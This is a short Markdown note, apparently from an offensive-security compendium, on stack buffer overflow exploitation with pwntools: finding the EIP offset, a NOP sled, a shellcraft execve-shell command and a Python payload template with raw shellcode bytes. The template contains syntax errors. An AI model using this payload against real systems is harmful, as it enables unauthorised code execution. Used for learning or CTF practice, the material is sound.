killchain-compendium/exploit/buffer_overflow/docs/cut_stack_in_half.md

33 lines
832 B
Markdown
Raw Normal View History

2021-08-27 23:38:42 +02:00
# Cut Stack in Half + NOPsled
* Stack has to be executable
* `cylic buffer` + `eip` content is `esp` + half of the stack + NOPsled + shellcode
* **ASLR has to be off** or `eip` content address pointing into the sled needs to be fuzzed hard
## shellcraft
* for example
```sh
shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s
```
## Usage
* measure `eip` offset via
```sh
cyclic <number>
```
* Check eip content via gdb
```sh
cyclic -l <eipContent>
```
* Example code
```python
from pwn import *
padding(cyclic(cyclic_find(<eipContent>))
eip = p32(<esp> + some offset into stack)
sled = 90 * 100
shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"
payload = padding + eip + sled + shellcode
```